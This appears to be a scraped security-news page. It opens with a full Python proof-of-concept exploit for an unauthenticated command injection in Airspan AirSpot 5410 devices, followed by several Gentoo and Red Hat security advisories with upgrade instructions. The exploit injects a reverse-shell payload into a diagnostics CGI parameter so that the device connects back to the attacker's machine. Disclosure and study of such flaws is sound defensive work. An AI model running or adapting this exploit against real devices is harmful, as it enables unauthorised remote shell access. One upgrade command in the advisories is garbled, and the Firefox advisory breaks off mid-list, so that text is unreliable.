AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.

    # -*- coding: utf-8 -*-# Exploit Title: AirSpot unauthenticated remote command injection# Date: 7/26/2022# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)# Vendor Homepage: https://www.airspan.com/# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf# Version: 0.3.4.1-4 and under.# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)# CVE : CVE-2022-36267from __future__ import print_function, unicode_literalsimport argparseimport requestsimport urllib3urllib3.disable_warnings()def banner():  airspanLogo = """       ,-.     / \  `.  __..-,O    :   \ --''_..-'.'    |    . .-' `. '.    :     .     .`.'     \     `.  /  ..      \      `.   ' .       `,       `.   \      ,|,`.        `-.\     '.||  ``-...__..-`      |  | Airspan       |__| AirSpot 5410      /||\ PWNED x_x     //||\\    // || \\ __//__||__\\__'--------------'Necrum Security Labs                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                                 FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))def pingWebInterface(RHOST, RPORT):  url = 'https://{}:{}'.format(RHOST, RPORT)  try:    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)    if response.status_code != 200:      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')      exit()    print('[INFO] Airspan device web interface seems reachable!')  except:    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')    exit()def execReverseShell(RHOST, RPORT, LHOST, LPORT):  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)  try:    print('[INFO] Executing reverse shell...')    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))    return  except Exception as e:      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)      return Falsedef main():  banner()  args = parser.parse_args()  pingWebInterface(args.RHOST, args.RPORT)  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)if __name__ == "__main__":  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)  main()

AirSpot 5410 0.3.4.1-4 Remote Command Injection

Red Hat Security Advisory 2022-5069-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.0. Issues addressed include code execution, cross site scripting, denial of service, information leakage, and traversal vulnerabilities.

Red Hat Security Advisory 2022-5069-01

Gentoo Linux Security Advisory 202208-11 - A vulnerability has been discovered in pam-u2f which could allow a local attacker to bypass PIN entry. Versions less than 1.1.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Yubico pam-u2f: Local PIN Bypass vulnerability  
     Date: August 10, 2022  
     Bugs: #792270  
       ID: 202208-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in pam-u2f which could allow a local  
attacker to bypass PIN entry.

Background  
=========  
Yubico pam-u2f is a PAM module for FIDO2 and U2F keys.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  sys-auth/pam_u2f           < 1.1.1                      >= 1.1.1

Description  
==========  
A logic issue in Yubico pam-u2f could result in the bypass of a PIN  
entry requirement when authenticating with FIDO2.

Impact  
=====  
An attacker with local access to certain applications using pam-u2f for authentication could incorrectly successfully authenticate without entering the authentication PIN.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Yubico pam-u2f users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-auth/pam_u2f-1.1.1"

References  
=========  
[ 1 ] CVE-2021-31924  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31924  
[ 2 ] YSA-2021-03

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-11

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-11

Gentoo Linux Security Advisory 202208-6 - Multiple vulnerabilities have been discovered in lxml, the worst of which could result in denial of service. Versions less than 4.9.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: lxml: Multiple Vulnerabilities  
     Date: August 10, 2022  
     Bugs: #777579, #829053, #856598  
       ID: 202208-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in lxml, the worst of  
which could result in denial of service.

Background  
=========  
lxml is a Pythonic binding for the libxml2 and libxslt libraries.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-python/lxml            < 4.9.1                      >= 4.9.1

Description  
==========  
Multiple vulnerabilities have been discovered in lxml. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All lxml users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-python/lxml-4.9.1"

References  
=========  
[ 1 ] CVE-2021-28957  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28957  
[ 2 ] CVE-2021-43818  
      https://nvd.nist.gov/vuln/detail/CVE-2021-43818  
[ 3 ] CVE-2022-2309  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2309  
[ 4 ] GHSL-2021-1037  
[ 5 ] GHSL-2021-1038

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-06

Gentoo Linux Security Advisory 202208-12 - Multiple vulnerabilities have been discovered in mdbtools. Versions less than 0.9.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: mdbtools: Multiple Vulnerabilities  
     Date: August 10, 2022  
     Bugs: #773289, #830371  
       ID: 202208-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in mdbtools, the worst of  
which

Background  
=========  
mdbtools is a set of libraries and utilities for reading Microsoft  
Access database (MDB) files.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-office/mdbtools        < 0.9.3                      >= 0.9.3

Description  
==========  
Multiple vulnerabilities have been discovered in mdbtools. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All mdbtools users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-office/mdbtools-0.9.3"

References  
=========  
[ 1 ] CVE-2021-45926  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45926  
[ 2 ] CVE-2021-45927  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45927

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-12

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-12

Gentoo Linux Security Advisory 202208-14 - Multiple vulnerabilities have been found in Mozilla Thunderbird, the worst of which could result in the arbitrary execution of code. Versions less than 91.12.0 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202208-14- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: Mozilla Thunderbird: Multiple Vulnerabilities     Date: August 10, 2022     Bugs: #794085, #802759, #807943, #811912, #813501, #822294, #828539, #831040, #833520, #834805, #845057, #846596, #849047, #857048, #864577       ID: 202208-14- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis=======Multiple vulnerabilities have been found in Mozilla Thunderbird, theworst of which could result in the arbitrary execution of code.Background=========Mozilla Thunderbird is a popular open-source email client from theMozilla project.Affected packages================    -------------------------------------------------------------------     Package              /     Vulnerable     /            Unaffected    -------------------------------------------------------------------  1  mail-client/thunderbird    < 91.12.0                  >= 91.12.0  2  mail-client/thunderbird-bin< 91.12.0                  >= 91.12.0Description==========Multiple vulnerabilities have been discovered in Mozilla Thunderbird.Please review the CVE identifiers referenced below for details.Impact=====Please review the referenced CVE identifiers for details.Workaround=========There is no known workaround at this time.Resolution=========All Mozilla Thunderbird users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-91.12.0"All Mozilla Thunderbird binary users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-91.12.0"References=========[ 1 ] CVE-2021-4129      https://nvd.nist.gov/vuln/detail/CVE-2021-4129[ 2 ] CVE-2021-4140      https://nvd.nist.gov/vuln/detail/CVE-2021-4140[ 3 ] CVE-2021-29967      https://nvd.nist.gov/vuln/detail/CVE-2021-29967[ 4 ] CVE-2021-29969      https://nvd.nist.gov/vuln/detail/CVE-2021-29969[ 5 ] CVE-2021-29970      https://nvd.nist.gov/vuln/detail/CVE-2021-29970[ 6 ] CVE-2021-29976      https://nvd.nist.gov/vuln/detail/CVE-2021-29976[ 7 ] CVE-2021-29980      https://nvd.nist.gov/vuln/detail/CVE-2021-29980[ 8 ] CVE-2021-29984      https://nvd.nist.gov/vuln/detail/CVE-2021-29984[ 9 ] CVE-2021-29985      https://nvd.nist.gov/vuln/detail/CVE-2021-29985[ 10 ] CVE-2021-29986      https://nvd.nist.gov/vuln/detail/CVE-2021-29986[ 11 ] CVE-2021-29988      https://nvd.nist.gov/vuln/detail/CVE-2021-29988[ 12 ] CVE-2021-29989      https://nvd.nist.gov/vuln/detail/CVE-2021-29989[ 13 ] CVE-2021-30547      https://nvd.nist.gov/vuln/detail/CVE-2021-30547[ 14 ] CVE-2021-38492      https://nvd.nist.gov/vuln/detail/CVE-2021-38492[ 15 ] CVE-2021-38493      https://nvd.nist.gov/vuln/detail/CVE-2021-38493[ 16 ] CVE-2021-38495      https://nvd.nist.gov/vuln/detail/CVE-2021-38495[ 17 ] CVE-2021-38503      https://nvd.nist.gov/vuln/detail/CVE-2021-38503[ 18 ] CVE-2021-38504      https://nvd.nist.gov/vuln/detail/CVE-2021-38504[ 19 ] CVE-2021-38506      https://nvd.nist.gov/vuln/detail/CVE-2021-38506[ 20 ] CVE-2021-38507      https://nvd.nist.gov/vuln/detail/CVE-2021-38507[ 21 ] CVE-2021-38508      https://nvd.nist.gov/vuln/detail/CVE-2021-38508[ 22 ] CVE-2021-38509      https://nvd.nist.gov/vuln/detail/CVE-2021-38509[ 23 ] CVE-2021-40529      https://nvd.nist.gov/vuln/detail/CVE-2021-40529[ 24 ] CVE-2021-43528      https://nvd.nist.gov/vuln/detail/CVE-2021-43528[ 25 ] CVE-2021-43529      https://nvd.nist.gov/vuln/detail/CVE-2021-43529[ 26 ] CVE-2021-43536      https://nvd.nist.gov/vuln/detail/CVE-2021-43536[ 27 ] CVE-2021-43537      https://nvd.nist.gov/vuln/detail/CVE-2021-43537[ 28 ] CVE-2021-43538      https://nvd.nist.gov/vuln/detail/CVE-2021-43538[ 29 ] CVE-2021-43539      https://nvd.nist.gov/vuln/detail/CVE-2021-43539[ 30 ] CVE-2021-43541      https://nvd.nist.gov/vuln/detail/CVE-2021-43541[ 31 ] CVE-2021-43542      https://nvd.nist.gov/vuln/detail/CVE-2021-43542[ 32 ] CVE-2021-43543      https://nvd.nist.gov/vuln/detail/CVE-2021-43543[ 33 ] CVE-2021-43545      https://nvd.nist.gov/vuln/detail/CVE-2021-43545[ 34 ] CVE-2021-43546      https://nvd.nist.gov/vuln/detail/CVE-2021-43546[ 35 ] CVE-2022-0566      https://nvd.nist.gov/vuln/detail/CVE-2022-0566[ 36 ] CVE-2022-1196      https://nvd.nist.gov/vuln/detail/CVE-2022-1196[ 37 ] CVE-2022-1197      https://nvd.nist.gov/vuln/detail/CVE-2022-1197[ 38 ] CVE-2022-1520      https://nvd.nist.gov/vuln/detail/CVE-2022-1520[ 39 ] CVE-2022-1529      https://nvd.nist.gov/vuln/detail/CVE-2022-1529[ 40 ] CVE-2022-1802      https://nvd.nist.gov/vuln/detail/CVE-2022-1802[ 41 ] CVE-2022-1834      https://nvd.nist.gov/vuln/detail/CVE-2022-1834[ 42 ] CVE-2022-2200      https://nvd.nist.gov/vuln/detail/CVE-2022-2200[ 43 ] CVE-2022-2226      https://nvd.nist.gov/vuln/detail/CVE-2022-2226[ 44 ] CVE-2022-22737      https://nvd.nist.gov/vuln/detail/CVE-2022-22737[ 45 ] CVE-2022-22738      https://nvd.nist.gov/vuln/detail/CVE-2022-22738[ 46 ] CVE-2022-22739      https://nvd.nist.gov/vuln/detail/CVE-2022-22739[ 47 ] CVE-2022-22740      https://nvd.nist.gov/vuln/detail/CVE-2022-22740[ 48 ] CVE-2022-22741      https://nvd.nist.gov/vuln/detail/CVE-2022-22741[ 49 ] CVE-2022-22742      https://nvd.nist.gov/vuln/detail/CVE-2022-22742[ 50 ] CVE-2022-22743      https://nvd.nist.gov/vuln/detail/CVE-2022-22743[ 51 ] CVE-2022-22745      https://nvd.nist.gov/vuln/detail/CVE-2022-22745[ 52 ] CVE-2022-22747      https://nvd.nist.gov/vuln/detail/CVE-2022-22747[ 53 ] CVE-2022-22748      https://nvd.nist.gov/vuln/detail/CVE-2022-22748[ 54 ] CVE-2022-22751      https://nvd.nist.gov/vuln/detail/CVE-2022-22751[ 55 ] CVE-2022-22754      https://nvd.nist.gov/vuln/detail/CVE-2022-22754[ 56 ] CVE-2022-22756      https://nvd.nist.gov/vuln/detail/CVE-2022-22756[ 57 ] CVE-2022-22759      https://nvd.nist.gov/vuln/detail/CVE-2022-22759[ 58 ] CVE-2022-22760      https://nvd.nist.gov/vuln/detail/CVE-2022-22760[ 59 ] CVE-2022-22761      https://nvd.nist.gov/vuln/detail/CVE-2022-22761[ 60 ] CVE-2022-22763      https://nvd.nist.gov/vuln/detail/CVE-2022-22763[ 61 ] CVE-2022-22764      https://nvd.nist.gov/vuln/detail/CVE-2022-22764[ 62 ] CVE-2022-24713      https://nvd.nist.gov/vuln/detail/CVE-2022-24713[ 63 ] CVE-2022-26381      https://nvd.nist.gov/vuln/detail/CVE-2022-26381[ 64 ] CVE-2022-26383      https://nvd.nist.gov/vuln/detail/CVE-2022-26383[ 65 ] CVE-2022-26384      https://nvd.nist.gov/vuln/detail/CVE-2022-26384[ 66 ] CVE-2022-26386      https://nvd.nist.gov/vuln/detail/CVE-2022-26386[ 67 ] CVE-2022-26387      https://nvd.nist.gov/vuln/detail/CVE-2022-26387[ 68 ] CVE-2022-26485      https://nvd.nist.gov/vuln/detail/CVE-2022-26485[ 69 ] CVE-2022-26486      https://nvd.nist.gov/vuln/detail/CVE-2022-26486[ 70 ] CVE-2022-28281      https://nvd.nist.gov/vuln/detail/CVE-2022-28281[ 71 ] CVE-2022-28282      https://nvd.nist.gov/vuln/detail/CVE-2022-28282[ 72 ] CVE-2022-28285      https://nvd.nist.gov/vuln/detail/CVE-2022-28285[ 73 ] CVE-2022-28286      https://nvd.nist.gov/vuln/detail/CVE-2022-28286[ 74 ] CVE-2022-28289      https://nvd.nist.gov/vuln/detail/CVE-2022-28289[ 75 ] CVE-2022-29909      https://nvd.nist.gov/vuln/detail/CVE-2022-29909[ 76 ] CVE-2022-29911      https://nvd.nist.gov/vuln/detail/CVE-2022-29911[ 77 ] CVE-2022-29912      https://nvd.nist.gov/vuln/detail/CVE-2022-29912[ 78 ] CVE-2022-29913      https://nvd.nist.gov/vuln/detail/CVE-2022-29913[ 79 ] CVE-2022-29914      https://nvd.nist.gov/vuln/detail/CVE-2022-29914[ 80 ] CVE-2022-29916      https://nvd.nist.gov/vuln/detail/CVE-2022-29916[ 81 ] CVE-2022-29917      https://nvd.nist.gov/vuln/detail/CVE-2022-29917[ 82 ] CVE-2022-31736      https://nvd.nist.gov/vuln/detail/CVE-2022-31736[ 83 ] CVE-2022-31737      https://nvd.nist.gov/vuln/detail/CVE-2022-31737[ 84 ] CVE-2022-31738      https://nvd.nist.gov/vuln/detail/CVE-2022-31738[ 85 ] CVE-2022-31740      https://nvd.nist.gov/vuln/detail/CVE-2022-31740[ 86 ] CVE-2022-31741      https://nvd.nist.gov/vuln/detail/CVE-2022-31741[ 87 ] CVE-2022-31742      https://nvd.nist.gov/vuln/detail/CVE-2022-31742[ 88 ] CVE-2022-31747      https://nvd.nist.gov/vuln/detail/CVE-2022-31747[ 89 ] CVE-2022-34468      https://nvd.nist.gov/vuln/detail/CVE-2022-34468[ 90 ] CVE-2022-34470      https://nvd.nist.gov/vuln/detail/CVE-2022-34470[ 91 ] CVE-2022-34472      https://nvd.nist.gov/vuln/detail/CVE-2022-34472[ 92 ] CVE-2022-34478      https://nvd.nist.gov/vuln/detail/CVE-2022-34478[ 93 ] CVE-2022-34479      https://nvd.nist.gov/vuln/detail/CVE-2022-34479[ 94 ] CVE-2022-34481      https://nvd.nist.gov/vuln/detail/CVE-2022-34481[ 95 ] CVE-2022-34484      https://nvd.nist.gov/vuln/detail/CVE-2022-34484[ 96 ] CVE-2022-36318      https://nvd.nist.gov/vuln/detail/CVE-2022-36318[ 97 ] CVE-2022-36319      https://nvd.nist.gov/vuln/detail/CVE-2022-36319[ 98 ] MOZ-2021-0007[ 99 ] MOZ-2021-0008Availability===========This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202208-14Concerns?========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License======Copyright 2022 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-14

Gentoo Linux Security Advisory 202208-10 - Multiple vulnerabilities have been found in Spice Server, the worst of which may result in the remote execution of arbitrary code. Versions less than 0.15.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Spice Server: Multiple Vulnerabilities  
     Date: August 10, 2022  
     Bugs: #746920, #792618  
       ID: 202208-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in Spice Server, the worst of  
which may result in the remote execution of arbitrary code.

Background  
=========  
Provides a complete open source solution for remote access to virtual  
machines in a seamless way so you can play videos, record audio, share  
USB devices and share folders without complications.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-emulation/spice        < 0.15.0                    >= 0.15.0

Description  
==========  
Multiple vulnerabilities have been discovered in Spice Server, please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Spice Server users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/spice-0.15.0"

References  
=========  
[ 1 ] CVE-2021-14355  
      https://nvd.nist.gov/vuln/detail/CVE-2021-14355  
[ 2 ] CVE-2021-20201  
      https://nvd.nist.gov/vuln/detail/CVE-2021-20201

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-10

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-10

Gentoo Linux Security Advisory 202208-7 - A buffer overread in LibRaw might allow an attacker to cause denial of service. Versions less than 0.20.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: LibRaw: Stack buffer overread  
     Date: August 10, 2022  
     Bugs: #793956  
       ID: 202208-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A buffer overread in LibRaw might allow an attacker to cause denial of  
service.

Background  
=========  
LibRaw is a library for reading RAW files obtained from digital photo  
cameras.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  media-libs/libraw          < 0.20.2                    >= 0.20.2

Description  
==========  
LibRaw incorrectly handles parsing DNG fields in some cases, potentially  
resulting in a buffer overread leading to denial of service.

Impact  
=====  
An attacker capable of providing crafted input to LibRaw could trigger denial of service.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All LibRaw users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libraw-0.20.2"

References  
=========  
[ 1 ] CVE-2020-24870  
      https://nvd.nist.gov/vuln/detail/CVE-2020-24870

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-07

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-07

Gentoo Linux Security Advisory 202208-8 - Multiple vulnerabilities have been found in Mozilla Firefox, the worst of which could result in the arbitrary execution of code. Versions less than 91.12.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: August 10, 2022  
     Bugs: #834631, #834804, #836866, #842438, #846593, #849044, #857045, #861515  
       ID: 202208-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in Mozilla Firefox, the worst  
of which could result in the arbitrary execution of code.

Background  
=========  
Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/firefox         < 91.12.0:esr          >= 91.12.0:esr  
                                < 103.0:rapid          >= 103.0:rapid  
  2  www-client/firefox-bin     < 91.12.0:esr          >= 91.12.0:esr  
                                < 103.0:rapid          >= 103.0:rapid

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-91.12.0:esr"

All Mozilla Firefox ESR binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-91.12.0:esr"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-103.0:rapid"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-103.0:rapid"

References  
=========  
[ 1 ] CVE-2022-0843  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0843  
[ 2 ] CVE-2022-1196  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1196  
[ 3 ] CVE-2022-1529  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1529  
[ 4 ] CVE-2022-1802  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1802  
[ 5 ] CVE-2022-1919  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1919  
[ 6 ] CVE-2022-2200  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2200  
[ 7 ] CVE-2022-2505  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2505  
[ 8 ] CVE-2022-24713  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24713  
[ 9 ] CVE-2022-26381  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26381  
[ 10 ] CVE-2022-26382  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26382  
[ 11 ] CVE-2022-26383  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26383  
[ 12 ] CVE-2022-26384  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26384  
[ 13 ] CVE-2022-26385  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26385  
[ 14 ] CVE-2022-26386  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26386  
[ 15 ] CVE-2022-26387  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26387  
[ 16 ] CVE-2022-26485  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26485  
[ 17 ] CVE-2022-26486  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26486  
[ 18 ] CVE-2022-28281  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28281  
[ 19 ] CVE-2022-28282  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28282  
[ 20 ] CVE-2022-28283  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28283  
[ 21 ] CVE-2022-28284  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28284  
[ 22 ] CVE-2022-28285  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28285  
[ 23 ] CVE-2022-28286  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28286  
[ 24 ] CVE-2022-28287  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28287  
[ 25 ] CVE-2022-28288  
